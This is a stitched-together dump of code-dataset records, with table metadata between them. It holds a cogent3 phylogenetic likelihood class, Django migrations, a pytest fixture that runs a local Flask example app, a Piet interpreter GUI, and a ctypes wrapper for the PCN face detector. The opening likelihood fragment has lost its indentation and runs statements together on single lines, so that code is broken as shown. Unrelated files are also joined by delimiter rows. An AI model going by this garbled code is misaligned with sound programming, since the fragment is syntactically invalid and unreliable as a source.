defn = self.make_likelihood_defn(**kw)
super(_LF, self).__init__(defn)
self.set_default_param_rules()
self.set_default_tree_parameter_rules()
self.mprobs_from_alignment = motif_probs_from_align
self.optimise_motif_probs = optimise_motif_probs
self._name = ""
self._format = {}
def save(self, filename):
with open(filename, "w") as f:
temp = {}
try:
for d in self.defns:
temp[id(d)] = d.values
del d.values
pickle.dump((1.0, None, self), f)
finally:
for d in self.defns:
if id(d) in temp:
d.values = temp[id(d)]
def set_default_tree_parameter_rules(self):
with self.updates_postponed():
edges = self.tree.get_edge_vector()
for par_name in self.model.get_param_list():
try:
values = dict(
[
(edge.name, edge.params[par_name])
for edge in edges
if not edge.isroot()
]
)
(uniq, index) = _indexed(values)
except KeyError:
continue for (u, value) in enumerate(uniq):
group = [edge for (edge, i) in list(index.items()) if i == u]
self.set_param_rule(par_name, edges=group, init=value)
for edge in edges:
if edge.length is not None:
try:
self.set_param_rule("length", edge=edge.name, init=edge.length)
except KeyError:
warnings.warn("Ignoring tree edge lengths", stacklevel=4)
break
def set_motif_probs_from_data(
self,
align,
locus=None,
is_constant=None,
include_ambiguity=False,
is_independent=None,
auto=False,
pseudocount=None,
**kwargs,
):
counts = self.model.count_motifs(align, include_ambiguity=include_ambiguity)
if is_constant is None:
is_constant = not self.optimise_motif_probs
if pseudocount is None:
if is_constant:
pseudocount = 0.0
else:
pseudocount = 0.5
counts += pseudocount
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(
mprobs,
locus=locus,
is_constant=is_constant,
is_independent=is_independent,
auto=auto,
**kwargs,
)
def set_motif_probs(
self,
motif_probs,
locus=None,
bin=None,
is_constant=None,
is_independent=None,
auto=False,
**kwargs,
):
motif_probs = self.model.adapt_motif_probs(motif_probs, auto=auto)
motif_probs = adjusted_gt_minprob(motif_probs, minprob=1e-6)
if is_constant is None:
is_constant = not self.optimise_motif_probs
self.model.set_param_controller_motif_probs(
self,
motif_probs,
is_constant=is_constant,
bin=bin,
locus=locus,
is_independent=is_independent,
**kwargs,
)
if not auto:
self.mprobs_from_alignment = False
def set_expm(self, expm):
assert expm in ["pade", "either", "eigen", "checked"], expm
self.set_param_rule("expm", is_constant=True, value=expm)
def make_calculator(self, **kw):
return super(_LF, self).make_calculator(**kw)
def _process_scope_info(
self,
edge=None,
tip_names=None,
edges=None,
clade=None,
stem=None,
outgroup_name=None,
):
if edges is not None:
if tip_names or edge:
raise TreeError("Only ONE of edge, edges or tip_names")
elif edge is not None:
if tip_names:
raise TreeError("Only ONE of edge, edges or tip_names")
edges = [edge]
elif tip_names is None:
edges = None elif len(tip_names) != 2:
raise TreeError("tip_names must contain 2 species")
else:
(species1, species2) = tip_names
if stem is None:
stem = False
if clade is None:
clade = not stem
edges = self.tree.get_edge_names(
species1, species2, stem=stem, clade=clade, outgroup_name=outgroup_name
)
return edges
def apply_param_rules(self, rules):
with self.updates_postponed():
for rule in rules:
self.set_param_rule(**rule)
def set_time_heterogeneity(
self,
exclude_params=None,
edge_sets=None,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
):
if is_constant and any([lower, init, upper]):
raise ValueError("cannot specify bounds or init for a constant param")
if is_constant:
kwargs = dict(is_constant=True, value=value)
else:
kwargs = dict(
is_independent=is_independent, init=init, lower=lower, upper=upper
)
rate_terms = self._model.get_param_list()
exclude_params = exclude_params or []
if exclude_params and type(exclude_params) == str:
exclude_params = [exclude_params]
for param in exclude_params:
if param not in rate_terms:
raise ValueError(f"'{param}' not a valid rate param")
rate_terms.remove(param)
if edge_sets is None:
edge_sets = [
dict(edges=[n]) for n in self.tree.get_node_names(includeself=False)
]
elif type(edge_sets) == dict:
edge_sets = [edge_sets]
param_rules = []
for edge_set in edge_sets:
edges = edge_set.get("edges", None)
if type(edges) == str:
edges = [edges]
if edges:
edges = list(edges)
edge_set["edges"] = edges
rule_base = kwargs.copy()
rule_base.update(edge_set)
for param in rate_terms:
rule = rule_base.copy()
rule.update(dict(par_name=param))
param_rules.append(rule)
self.apply_param_rules(param_rules)
def set_param_rule(
self,
par_name,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
**scope_info,
):
par_name = str(par_name)
scopes = {}
for (single, plural) in [
("bin", "bins"),
("locus", "loci"),
("position", "positions"),
("motif", "motifs"),
]:
if single in scope_info:
v = scope_info.pop(single)
if v:
assert isinstance(v, str), "%s=, maybe?" % plural
assert plural not in scope_info
scopes[single] = [v]
elif plural in scope_info:
v = scope_info.pop(plural)
if v:
scopes[single] = v
edges = self._process_scope_info(**scope_info)
if edges:
scopes["edge"] = edges
if is_constant:
assert not (init or lower or upper)
elif init is not None:
assert not value
value = init
self.assign_all(
par_name, scopes, value, lower, upper, is_constant, is_independent
)
def set_local_clock(self, tip1name, tip2name):
self.set_param_rule(
"length", tip_names=[tip1name, tip2name], clade=True, is_independent=0
)
def set_constant_lengths(self, tree=None, exclude_list=None):
exclude_list = exclude_list or []
if tree is None:
tree = self.tree
with self.updates_postponed():
for edge in tree.get_edge_vector():
if edge.length is None or edge.name in exclude_list:
continue
self.set_param_rule(
"length", edge=edge.name, is_constant=1, value=edge.length
)
def get_aic(self, second_order=False):
if second_order:
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index)
for l in self.locus_names
)
else:
sequence_length = None
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return aic(lnL, nfp, sequence_length)
def get_bic(self):
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index) for l in self.locus_names
)
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return bic(lnL, nfp, sequence_length)
class AlignmentLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
try:
self.assign_all("fixed_motif", None, value=-1, const=True, independent=True)
except KeyError:
pass
def make_likelihood_defn(self, sites_independent=True, discrete_edges=None):
defns = self.model.make_param_controller_defns(bin_names=self.bin_names)
if discrete_edges is not None:
from .discrete_markov import PartialyDiscretePsubsDefn
defns["psubs"] = PartialyDiscretePsubsDefn(
self.motifs, defns["psubs"], discrete_edges
)
return likelihood_calculation.make_total_loglikelihood_defn(
self.tree,
defns["align"],
defns["psubs"],
defns["word_probs"],
defns["bprobs"],
self.bin_names,
self.locus_names,
sites_independent,
)
def set_alignment(self, aligns, motif_pseudocount=None):
if type(aligns) is not list:
aligns = [aligns]
assert len(aligns) == len(self.locus_names), len(aligns)
tip_names = set(self.tree.get_tip_names())
for index, aln in enumerate(aligns):
if len(aligns) > 1:
locus_name = "for locus '%s'" % self.locus_names[index]
else:
locus_name = ""
assert not set(aln.names).symmetric_difference(tip_names), (
"Tree tip names %s and aln seq names %s don't match %s"
% (self.tree.get_tip_names(), aln.names, locus_name)
)
assert "root" not in aln.names, "'root' is a reserved name."
with self.updates_postponed():
for (locus_name, align) in zip(self.locus_names, aligns):
self.assign_all(
"alignment", {"locus": [locus_name]}, value=align, const=True
)
if self.mprobs_from_alignment:
self.set_motif_probs_from_data(
align,
locus=locus_name,
auto=True,
pseudocount=motif_pseudocount,
)
class SequenceLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
pass
def make_likelihood_defn(
self, sites_independent=None, with_indel_params=True, kn=True
):
assert sites_independent is None or not sites_independent
assert len(self.locus_names) == 1
return dp_calculation.make_forward_tree_defn(
self.model,
self.tree,
self.bin_names,
with_indel_params=with_indel_params,
kn=kn,
)
def set_sequences(self, seqs, locus=None):
from cogent3.core.alignment import SequenceCollection
leaves = {}
if isinstance(seqs, SequenceCollection):
seqs = seqs.named_seqs
for (name, seq) in list(seqs.items()):
# if has uniq, probably already a likelihood tree leaf obj already
if hasattr(seq, "uniq"):
# XXX more checks - same alphabet as model, name etc ...
leaf = seq
else:
leaf = self.model.convert_sequence(seq, name)
leaf = AlignableSeq(leaf)
leaves[name] = leaf
assert name != "root", "'root' is a reserved name."
self.set_pogs(leaves, locus=locus)
def set_pogs(self, leaves, locus=None):
with self.updates_postponed():
for (name, pog) in list(leaves.items()):
self.set_param_rule("leaf", edge=name, value=pog, is_constant=True)
if self.mprobs_from_alignment:
counts = numpy.sum(
[pog.leaf.get_motif_counts() for pog in list(leaves.values())], 0
)
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(mprobs, locus=locus, is_constant=True, auto=True)
| true
| true
|
f707c24839da39506721babe09f891449d8663ef
| 1,036
|
py
|
Python
|
bmat_app/migrations/0001_initial.py
|
dlouky/bmat_test_dlouky
|
970cbfb04c2f55a1a29ffb09b94db360720b36e1
|
[
"MIT"
] | null | null | null |
bmat_app/migrations/0001_initial.py
|
dlouky/bmat_test_dlouky
|
970cbfb04c2f55a1a29ffb09b94db360720b36e1
|
[
"MIT"
] | null | null | null |
bmat_app/migrations/0001_initial.py
|
dlouky/bmat_test_dlouky
|
970cbfb04c2f55a1a29ffb09b94db360720b36e1
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.4 on 2021-07-05 08:34
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="MusicalWork",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("title", models.CharField(max_length=60, null=True)),
(
"contributors",
django.contrib.postgres.fields.ArrayField(
base_field=models.CharField(max_length=60), size=None
),
),
("iswc", models.CharField(max_length=11, null=True, unique=True)),
],
),
]
| 28
| 82
| 0.454633
|
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="MusicalWork",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("title", models.CharField(max_length=60, null=True)),
(
"contributors",
django.contrib.postgres.fields.ArrayField(
base_field=models.CharField(max_length=60), size=None
),
),
("iswc", models.CharField(max_length=11, null=True, unique=True)),
],
),
]
| true
| true
|
f707c3d48ff3381958bab352d03ceae35bf3abc1
| 1,280
|
py
|
Python
|
tests/test_examples_app.py
|
kprzerwa/cds-migrator-kit
|
443126e435483be460b0d48295f4878ada1e9445
|
[
"MIT"
] | null | null | null |
tests/test_examples_app.py
|
kprzerwa/cds-migrator-kit
|
443126e435483be460b0d48295f4878ada1e9445
|
[
"MIT"
] | null | null | null |
tests/test_examples_app.py
|
kprzerwa/cds-migrator-kit
|
443126e435483be460b0d48295f4878ada1e9445
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# cds-migrator-kit is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test example app."""
import os
import signal
import subprocess
import time
from os.path import abspath, dirname, join
import pytest
@pytest.yield_fixture
def example_app():
"""Example app fixture."""
current_dir = os.getcwd()
# Go to example directory
project_dir = dirname(dirname(abspath(__file__)))
exampleapp_dir = join(project_dir, 'examples')
os.chdir(exampleapp_dir)
# Setup application
assert subprocess.call('./app-setup.sh', shell=True) == 0
# Start example app
webapp = subprocess.Popen(
'FLASK_APP=app.py flask run --debugger -p 5000',
stdout=subprocess.PIPE, preexec_fn=os.setsid, shell=True)
time.sleep(10)
yield webapp
# Stop server
os.killpg(webapp.pid, signal.SIGTERM)
# Return to the original directory
os.chdir(current_dir)
def test_example_app_role_admin(example_app):
"""Test example app."""
cmd = 'curl http://0.0.0.0:5000/'
output = subprocess.check_output(cmd, shell=True)
assert b'migrator' in output
| 24.615385
| 77
| 0.690625
|
import os
import signal
import subprocess
import time
from os.path import abspath, dirname, join
import pytest
@pytest.yield_fixture
def example_app():
current_dir = os.getcwd()
project_dir = dirname(dirname(abspath(__file__)))
exampleapp_dir = join(project_dir, 'examples')
os.chdir(exampleapp_dir)
assert subprocess.call('./app-setup.sh', shell=True) == 0
webapp = subprocess.Popen(
'FLASK_APP=app.py flask run --debugger -p 5000',
stdout=subprocess.PIPE, preexec_fn=os.setsid, shell=True)
time.sleep(10)
yield webapp
os.killpg(webapp.pid, signal.SIGTERM)
os.chdir(current_dir)
def test_example_app_role_admin(example_app):
cmd = 'curl http://0.0.0.0:5000/'
output = subprocess.check_output(cmd, shell=True)
assert b'migrator' in output
| true
| true
|
f707c417fb0814be2f4aec97fbb1c3e8d5524efa
| 1,189
|
py
|
Python
|
flowcelltool/flowcells/migrations/0006_auto_20180320_0622.py
|
bihealth/flowcelltool
|
6e16190fc34c54d834ecd23888a462f3af47611d
|
[
"MIT"
] | 7
|
2016-10-12T12:56:09.000Z
|
2020-10-27T17:08:09.000Z
|
flowcelltool/flowcells/migrations/0006_auto_20180320_0622.py
|
iamh2o/flowcelltool
|
6e16190fc34c54d834ecd23888a462f3af47611d
|
[
"MIT"
] | 94
|
2016-10-24T06:28:31.000Z
|
2018-08-06T10:35:13.000Z
|
flowcelltool/flowcells/migrations/0006_auto_20180320_0622.py
|
iamh2o/flowcelltool
|
6e16190fc34c54d834ecd23888a462f3af47611d
|
[
"MIT"
] | 1
|
2022-03-23T15:57:16.000Z
|
2022-03-23T15:57:16.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-03-20 06:22
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('flowcells', '0005_auto_20180319_0947'),
]
operations = [
migrations.AddField(
model_name='barcodeset',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='barcodesetentry',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='flowcell',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='library',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='sequencingmachine',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
]
| 28.309524
| 71
| 0.583684
|
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('flowcells', '0005_auto_20180319_0947'),
]
operations = [
migrations.AddField(
model_name='barcodeset',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='barcodesetentry',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='flowcell',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='library',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='sequencingmachine',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
]
| true
| true
|
f707c48e4faab8a4f1b78efa7e6f01738bce697e
| 5,615
|
py
|
Python
|
ctf/2021 Google/piet_interpreter/GUI/main.py
|
jacobshu/binder
|
517494d688fd4b92f53e005daaea3d1b8e3083d6
|
[
"MIT"
] | 12
|
2020-11-14T22:59:38.000Z
|
2022-03-14T00:51:03.000Z
|
ctf/2021 Google/piet_interpreter/GUI/main.py
|
jacobshu/binder
|
517494d688fd4b92f53e005daaea3d1b8e3083d6
|
[
"MIT"
] | 2
|
2020-11-23T09:22:47.000Z
|
2021-09-15T12:25:02.000Z
|
ctf/2021 Google/piet_interpreter/GUI/main.py
|
jacobshu/binder
|
517494d688fd4b92f53e005daaea3d1b8e3083d6
|
[
"MIT"
] | 5
|
2020-10-26T12:12:14.000Z
|
2022-01-30T01:42:16.000Z
|
import pygubu
import os
from interpreter import imageFunctions as imageWrapper
from interpreter import lexer as lexer
from interpreter import executeFunctions as main
from interpreter.dataStructures import programState, direction, position
from GUI import infoManager
from GUI import canvasManager
class GUI:
def __init__(self):
# In pixelWidth/height per pixel. scaleSize = 25 means that every pixel will show as a 25x25 square
self.scaleSize = 15
# In percentage
self.executionSpeed = 15
# In seconds
self.maxWait = 5
self.image = None
self.graph = None
self.programState = None
self.selectedPosition = None
self.optionBar = None
self.actionBar = None
self.content = None
self.canvas = None
#1: Create a builder
self.builder = pygubu.Builder()
#2: Load an ui file
self.builder.add_from_file("{}/tkinterLayout.ui".format(os.path.abspath(os.path.dirname(__file__))))
#3: Create the mainwindow
self.mainwindow = self.builder.get_object('rootWindow')
self.initializeFrames()
self.initializeCallbacks()
self.infoManager = infoManager.infoManager(self.builder, self.generalInfoFrame, self.programStateInfoFrame)
self.canvasManager = canvasManager.canvasManager(self.canvas, self.image, self.programState, self.scaleSize)
def run(self):
self.mainwindow.mainloop()
def initializeCallbacks(self):
self.builder.connect_callbacks({
'loadFile': self.loadFile,
'setScale': self.setScale,
'takeStep': self.takeStep
})
horizontalBar = self.builder.get_object("canvasHorizontalScroll", self.canvasFrame)
verticalBar = self.builder.get_object("canvasVerticalScroll", self.canvasFrame)
horizontalBar.config(command = self.canvas.xview)
verticalBar.config(command = self.canvas.yview)
self.canvas.config(xscrollcommand=horizontalBar.set, yscrollcommand=verticalBar.set)
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def initializeFrames(self):
self.optionBar = self.builder.get_object('optionBar', self.mainwindow)
self.content = self.builder.get_object('content', self.mainwindow)
self.actionBar = self.builder.get_object('actionBar', self.mainwindow)
self.generalInfoFrame = self.builder.get_object("generalInfoFrame", self.content)
self.programStateInfoFrame = self.builder.get_object("programStateInfoFrame", self.content)
self.canvasFrame = self.builder.get_object('canvasFrame', self.content)
self.canvas = self.builder.get_object('canvas', self.canvasFrame)
def update(self):
self.infoManager.updateInfo(self.image, self.graph, self.programState)
self.canvasManager.updateScaleSize(self.scaleSize)
self.canvasManager.updateImage(self.image)
self.canvasManager.updateProgramState(self.programState)
self.canvasManager.updateCanvas()
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def takeStep(self):
if self.image is None or self.programState is None or self.graph is None:
return None
newProgramState = main.takeStep(self.image, self.programState)
# Error encountered, close window
if isinstance(newProgramState, BaseException):
self.mainwindow.destroy()
self.mainwindow.quit()
raise newProgramState
self.programState = newProgramState
self.selectedPosition = self.programState.position
self.update()
return True
def setFileText(self, filePath):
self.builder.get_object("fileNameEntry", self.optionBar).delete(0, len(self.builder.get_object("fileNameEntry", self.optionBar).get()))
self.builder.get_object("fileNameEntry", self.optionBar).insert(0, filePath)
def setExecutionSpeed(self, pos):
if 0 < float(pos) < 100:
self.executionSpeed = float(pos)
def setScale(self):
scaleValue = int(self.builder.get_object('scaleEntry', self.optionBar).get())
if 0 < scaleValue < 100:
self.canvasManager.clearCanvas()
self.scaleSize = int(scaleValue)
self.update()
self.canvasManager.drawImage()
self.canvasManager.updateCanvas()
def loadFile(self):
fileName = self.builder.get_object('fileNameEntry', self.optionBar).get()
if len(fileName) < 1:
return None
try:
tmpImage = imageWrapper.getImage(fileName)
except FileNotFoundError:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The file '{}' could not be found".format(fileName))
return False
tmpResult = lexer.graphImage(tmpImage)
if len(tmpResult[1]) != 0:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The following exceptions occured while making the graph:\n{}".format("".join(list(map(lambda x: "\t{}\n".format(x), tmpResult[1])))))
return False
self.image = tmpImage
self.graph = tmpResult[0]
self.programState = programState(self.graph, position((0,0)), direction((0,0)))
# Reset previous state
self.canvasManager.previousProgramState = None
self.canvasManager.programState = None
self.update()
| 38.197279
| 170
| 0.674443
|
import pygubu
import os
from interpreter import imageFunctions as imageWrapper
from interpreter import lexer as lexer
from interpreter import executeFunctions as main
from interpreter.dataStructures import programState, direction, position
from GUI import infoManager
from GUI import canvasManager
class GUI:
def __init__(self):
self.scaleSize = 15
self.executionSpeed = 15
self.maxWait = 5
self.image = None
self.graph = None
self.programState = None
self.selectedPosition = None
self.optionBar = None
self.actionBar = None
self.content = None
self.canvas = None
self.builder = pygubu.Builder()
self.builder.add_from_file("{}/tkinterLayout.ui".format(os.path.abspath(os.path.dirname(__file__))))
self.mainwindow = self.builder.get_object('rootWindow')
self.initializeFrames()
self.initializeCallbacks()
self.infoManager = infoManager.infoManager(self.builder, self.generalInfoFrame, self.programStateInfoFrame)
self.canvasManager = canvasManager.canvasManager(self.canvas, self.image, self.programState, self.scaleSize)
def run(self):
self.mainwindow.mainloop()
def initializeCallbacks(self):
self.builder.connect_callbacks({
'loadFile': self.loadFile,
'setScale': self.setScale,
'takeStep': self.takeStep
})
horizontalBar = self.builder.get_object("canvasHorizontalScroll", self.canvasFrame)
verticalBar = self.builder.get_object("canvasVerticalScroll", self.canvasFrame)
horizontalBar.config(command = self.canvas.xview)
verticalBar.config(command = self.canvas.yview)
self.canvas.config(xscrollcommand=horizontalBar.set, yscrollcommand=verticalBar.set)
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def initializeFrames(self):
self.optionBar = self.builder.get_object('optionBar', self.mainwindow)
self.content = self.builder.get_object('content', self.mainwindow)
self.actionBar = self.builder.get_object('actionBar', self.mainwindow)
self.generalInfoFrame = self.builder.get_object("generalInfoFrame", self.content)
self.programStateInfoFrame = self.builder.get_object("programStateInfoFrame", self.content)
self.canvasFrame = self.builder.get_object('canvasFrame', self.content)
self.canvas = self.builder.get_object('canvas', self.canvasFrame)
def update(self):
self.infoManager.updateInfo(self.image, self.graph, self.programState)
self.canvasManager.updateScaleSize(self.scaleSize)
self.canvasManager.updateImage(self.image)
self.canvasManager.updateProgramState(self.programState)
self.canvasManager.updateCanvas()
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def takeStep(self):
if self.image is None or self.programState is None or self.graph is None:
return None
newProgramState = main.takeStep(self.image, self.programState)
if isinstance(newProgramState, BaseException):
self.mainwindow.destroy()
self.mainwindow.quit()
raise newProgramState
self.programState = newProgramState
self.selectedPosition = self.programState.position
self.update()
return True
def setFileText(self, filePath):
self.builder.get_object("fileNameEntry", self.optionBar).delete(0, len(self.builder.get_object("fileNameEntry", self.optionBar).get()))
self.builder.get_object("fileNameEntry", self.optionBar).insert(0, filePath)
def setExecutionSpeed(self, pos):
if 0 < float(pos) < 100:
self.executionSpeed = float(pos)
def setScale(self):
scaleValue = int(self.builder.get_object('scaleEntry', self.optionBar).get())
if 0 < scaleValue < 100:
self.canvasManager.clearCanvas()
self.scaleSize = int(scaleValue)
self.update()
self.canvasManager.drawImage()
self.canvasManager.updateCanvas()
def loadFile(self):
fileName = self.builder.get_object('fileNameEntry', self.optionBar).get()
if len(fileName) < 1:
return None
try:
tmpImage = imageWrapper.getImage(fileName)
except FileNotFoundError:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The file '{}' could not be found".format(fileName))
return False
tmpResult = lexer.graphImage(tmpImage)
if len(tmpResult[1]) != 0:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The following exceptions occured while making the graph:\n{}".format("".join(list(map(lambda x: "\t{}\n".format(x), tmpResult[1])))))
return False
self.image = tmpImage
self.graph = tmpResult[0]
self.programState = programState(self.graph, position((0,0)), direction((0,0)))
self.canvasManager.previousProgramState = None
self.canvasManager.programState = None
self.update()
| true
| true
|
f707c5264e6ec80e70ed71e7ceed1450558bb7d9
| 6,126
|
py
|
Python
|
PCN/PyPCN.py
|
End-of-an-Era/PCN
|
3a2564caacad75c1351f5aca5d45bf246bcaa2d9
|
[
"BSD-2-Clause"
] | 317
|
2018-04-17T07:06:02.000Z
|
2018-10-19T01:42:30.000Z
|
PCN/PyPCN.py
|
DefTruth/FaceKit
|
043c3063014166d831c07197d4e6748e824a5587
|
[
"BSD-2-Clause"
] | 45
|
2019-01-14T18:17:01.000Z
|
2019-11-05T08:11:09.000Z
|
PCN/PyPCN.py
|
DefTruth/FaceKit
|
043c3063014166d831c07197d4e6748e824a5587
|
[
"BSD-2-Clause"
] | 86
|
2018-04-17T09:02:02.000Z
|
2018-10-18T11:14:31.000Z
|
#!/usr/bin/python3
from ctypes import *
import cv2
import numpy as np
import sys
import os
import time
from ipdb import set_trace as dbg
from enum import IntEnum
class CPoint(Structure):
_fields_ = [("x", c_int),
("y", c_int)]
FEAT_POINTS = 14
class CWindow(Structure):
_fields_ = [("x", c_int),
("y", c_int),
("width", c_int),
("angle", c_int),
("score", c_float),
("points",CPoint*FEAT_POINTS)]
class FeatEnam(IntEnum):
CHIN_0 = 0
CHIN_1 = 1
CHIN_2 = 2
CHIN_3 = 3
CHIN_4 = 4
CHIN_5 = 5
CHIN_6 = 6
CHIN_7 = 7
CHIN_8 = 8
NOSE = 9
EYE_LEFT = 10
EYE_RIGHT = 11
MOUTH_LEFT = 12
MOUTH_RIGHT = 13
FEAT_POINTS = 14
lib = CDLL("/usr/local/lib/libPCN.so")
init_detector = lib.init_detector
#void *init_detector(const char *detection_model_path,
# const char *pcn1_proto, const char *pcn2_proto, const char *pcn3_proto,
# const char *tracking_model_path, const char *tracking_proto,
# int min_face_size, float pyramid_scale_factor, float detection_thresh_stage1,
# float detection_thresh_stage2, float detection_thresh_stage3, int tracking_period,
# float tracking_thresh, int do_smooth)
init_detector.argtypes = [
c_char_p, c_char_p, c_char_p,
c_char_p, c_char_p, c_char_p,
c_int,c_float,c_float,c_float,
c_float,c_int,c_float,c_int]
init_detector.restype = c_void_p
#CWindow* detect_faces(void* pcn, unsigned char* raw_img,size_t rows, size_t cols, int *lwin)
detect_faces = lib.detect_faces
detect_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_faces.restype = POINTER(CWindow)
#CWindow* detect_track_faces(void* pcn, unsigned char* raw_img,size_t rows, size_t cols, int *lwin)
detect_track_faces = lib.detect_track_faces
detect_track_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_track_faces.restype = POINTER(CWindow)
#void free_faces(CWindow* wins)
free_faces = lib.free_faces
free_faces.argtypes= [c_void_p]
# void free_detector(void *pcn)
free_detector = lib.free_detector
free_detector.argtypes= [c_void_p]
CYAN=(255,255,0)
BLUE=(255,0,0)
RED=(0,0,255)
GREEN=(0,255,0)
YELLOW=(0,255,255)
def DrawFace(win,img):
width = 2
x1 = win.x
y1 = win.y
x2 = win.width + win.x - 1
y2 = win.width + win.y - 1
centerX = (x1 + x2) / 2
centerY = (y1 + y2) / 2
angle = win.angle
R = cv2.getRotationMatrix2D((centerX,centerY),angle,1)
pts = np.array([[x1,y1,1],[x1,y2,1],[x2,y2,1],[x2,y1,1]], np.int32)
pts = (pts @ R.T).astype(int) #Rotate points
pts = pts.reshape((-1,1,2))
cv2.polylines(img,[pts],True,CYAN,width)
cv2.line(img, (pts[0][0][0],pts[0][0][1]), (pts[3][0][0],pts[3][0][1]), BLUE, width)
def DrawPoints(win,img):
width = 2
f = FeatEnam.NOSE
cv2.circle(img,(win.points[f].x,win.points[f].y),width,GREEN,-1)
f = FeatEnam.EYE_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.EYE_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.MOUTH_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
f = FeatEnam.MOUTH_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
for i in range(8):
cv2.circle(img,(win.points[i].x,win.points[i].y),width,BLUE,-1)
def SetThreadCount(threads):
os.environ['OMP_NUM_THREADS'] = str(threads)
def c_str(str_in):
return c_char_p(str_in.encode('utf-8'))
video_flag = 0
if __name__=="__main__":
SetThreadCount(1)
path = '/usr/local/share/pcn/'
detection_model_path = c_str(path + "PCN.caffemodel")
pcn1_proto = c_str(path + "PCN-1.prototxt")
pcn2_proto = c_str(path + "PCN-2.prototxt")
pcn3_proto = c_str(path + "PCN-3.prototxt")
tracking_model_path = c_str(path + "PCN-Tracking.caffemodel")
tracking_proto = c_str(path + "PCN-Tracking.prototxt")
if video_flag:
cap = cv2.VideoCapture(0)
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,1)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
fps = cap.get(cv2.CAP_PROP_FPS)
while cap.isOpened():
ret, frame = cap.read()
if ret == False:
break
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_track_faces(detector, raw_data,
int(height), int(width),
pointer(face_count))
end = time.time()
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
fps = int(1 / (end - start))
cv2.putText(frame, str(fps) + "fps", (20, 45), 4, 1, (0, 0, 125))
cv2.imshow('PCN', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,0)
for i in range(1, 27):
frame = cv2.imread("imgs/" + str(i) + ".jpg")
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_faces(detector, raw_data,
frame.shape[0], frame.shape[1],
pointer(face_count))
end = time.time()
print(i, end - start, "s")
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
cv2.imshow('PCN', frame)
cv2.waitKey()
free_detector(detector)
| 33.845304
| 99
| 0.616389
|
from ctypes import *
import cv2
import numpy as np
import sys
import os
import time
from ipdb import set_trace as dbg
from enum import IntEnum
